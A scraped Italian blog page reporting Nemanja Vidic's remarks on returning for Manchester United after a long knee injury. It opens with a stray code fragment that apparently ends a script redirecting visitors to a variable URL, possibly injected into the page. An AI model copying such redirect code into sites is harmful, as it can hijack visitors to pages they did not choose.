location.href='". $red ."';"; exit(); } ?> Notizie 24 News: Manchester United, Vidic: "Bello tornare in campo"

Ads 468x60px

Random Post

Template Updates

domenica 5 agosto 2012

Manchester United, Vidic: "Bello tornare in campo"


 



MANCHESTER UNITED NEMANJA VIDIC - Dopo il lugo infortunio che ha tenuto fuori dai campi da gioco il difensore del Manchester United, Nemanja Vidic, il calciatore serbo 31enne ha rilasciato alcune dichiarazioni ai microfoni della televisione ufficiale del club, dove ha commentato la sua situazione fisica dopo l'amichevole terminata 0-0 contro il Valerenga, nella quale Vidic è stato schierato come capitano dei "Red Devils": "È andato tutto bene, mi sono sentito bene. Dopo otto mesi senza una partita, ovviamente perdi qualcosa a livello di forma e sensazioni in campo. Sono comunque contento, il mio ginocchio si è sentito bene e mi sono sentito bene fisicamente pure io. Spero che vada meglio la prossima partita. È stato frustrante, ma sapevo che sarei rimasto fuori per questi mesi. Ho provato a fare del mio meglio anche quando lontano dal campo, ho comunque lavorato per tornare al meglio, in maniera tale da poter avere un livello simile a quello prima dell'infortunio. Questo era il mio obiettivo, ora vedremo i frutti del mio lavoro negli scorsi sei mesi. Fa tutto parte della carriera di un calciatore. Ogni atleta deve affrontare infortuni e quanto ancora, spero solamente che i tempi bui ora siano alle mie spalle".

0 commenti:

Posta un commento

 

Sample text

Sample Text

Sample Text